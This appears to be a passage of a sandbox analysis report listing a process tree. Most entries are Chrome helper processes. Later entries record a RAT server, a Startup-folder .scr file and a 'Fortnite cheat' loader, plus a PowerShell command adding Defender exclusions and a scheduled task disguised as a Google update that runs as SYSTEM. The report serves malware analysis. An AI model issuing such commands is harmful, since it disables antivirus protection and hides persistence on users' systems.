    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2980 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:8292
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3068 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:2528
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3648 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:3624
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4624 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:8
    3⤵
    PID:5604
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4748 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:8
    3⤵
    PID:8660
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4664 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:8
    3⤵
    PID:5520
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4716 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:8
    3⤵
    PID:6448
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4744 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:8
    3⤵
    PID:8824
- - C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level
    3⤵
    PID:9252
  - - C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
      "C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x7ff678c1ae48,0x7ff678c1ae58,0x7ff678c1ae68
      4⤵
      PID:6872
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3360 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:7396
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3192 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:2
    3⤵
    PID:11160
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=1948 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:11756
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5924 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:6696
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5108 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:5272
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5084 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:8
    3⤵
    PID:1576
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5820 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:4124
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5832 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:9032
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5548 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:9980
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5428 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:8
    3⤵
    PID:9860
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5268 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:8
    3⤵
    PID:9872
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5420 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:11596
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5612 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:10408
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3380 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:2
    3⤵
    PID:11712
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=5776 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:8640
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5700 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:7672
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3388 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:2
    3⤵
    PID:5356
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2260 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:2
    3⤵
    PID:976
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=5832 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:5140
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=4776 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:3880
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=2208 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:9244
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=6224 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:8084
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=2356 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:6840
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=3860 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:9896
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=5288 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:8344
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=6108 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:5084
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=5224 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:4368
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=5064 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:1
    3⤵
    PID:1932
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4672 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:8
    3⤵
    PID:1064
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6400 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:8
    3⤵
    PID:6332
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=6220 --field-trial-handle=1912,i,10625538013619399248,2683341692718981462,131072 /prefetch:2
    3⤵
    PID:6148
- C:\Users\Admin\AppData\Local\Temp\Temp1_Release.zip\xeno rat server.exe
  "C:\Users\Admin\AppData\Local\Temp\Temp1_Release.zip\xeno rat server.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:1952
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Checks SCSI registry key(s)
  PID:10560
- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎  .scr
  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎  .scr" /S
  2⤵
  - Executes dropped EXE
  PID:8780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:2124
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffd4526ab58,0x7ffd4526ab68,0x7ffd4526ab78
    3⤵
    PID:6532
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:2
    3⤵
    PID:3544
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:8
    3⤵
    PID:7964
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2284 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:8
    3⤵
    PID:6124
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2844 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:1
    3⤵
    PID:8504
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2852 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:1
    3⤵
    PID:4420
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4416 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:1
    3⤵
    PID:12208
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4536 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:8
    3⤵
    PID:8924
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4736 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:8
    3⤵
    PID:8556
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3148 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:1
    3⤵
    PID:8932
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4080 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:1
    3⤵
    PID:9224
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5012 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:1
    3⤵
    PID:5564
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5036 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:1
    3⤵
    PID:4012
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4492 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:1
    3⤵
    PID:6512
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4720 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:8
    3⤵
    PID:864
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4320 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:8
    3⤵
    PID:7180
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4836 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:8
    3⤵
    PID:11252
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=1800 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:1
    3⤵
    PID:9308
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4624 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:1
    3⤵
    PID:1676
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=2636 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:1
    3⤵
    PID:2556
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5800 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:8
    3⤵
    PID:5260
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4544 --field-trial-handle=1740,i,7996855213424181107,8067961882167308070,131072 /prefetch:2
    3⤵
    PID:10640
- C:\Users\Admin\AppData\Local\Temp\Temp1_FortniteExternalCheat-main.zip\FortniteExternalCheat-main\Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Temp1_FortniteExternalCheat-main.zip\FortniteExternalCheat-main\Loader.exe"
  2⤵
  - Executes dropped EXE
  PID:6964
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:4560
- C:\Users\Admin\AppData\Local\Temp\Temp1_FortniteExternalCheat-main.zip\FortniteExternalCheat-main\Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Temp1_FortniteExternalCheat-main.zip\FortniteExternalCheat-main\Loader.exe"
  2⤵
  - Executes dropped EXE
  PID:4488
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:6716
- C:\Users\Admin\AppData\Local\Temp\Temp1_FortniteExternalCheat-main.zip\FortniteExternalCheat-main\Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Temp1_FortniteExternalCheat-main.zip\FortniteExternalCheat-main\Loader.exe"
  2⤵
  - Executes dropped EXE
  PID:6996
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:6736
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Checks SCSI registry key(s)
  PID:9936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:5628
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:10712
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\ideffxuftjmx.xml"
  2⤵
  - Creates scheduled task(s)
  PID:10288
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:11372
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:8900
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:10016
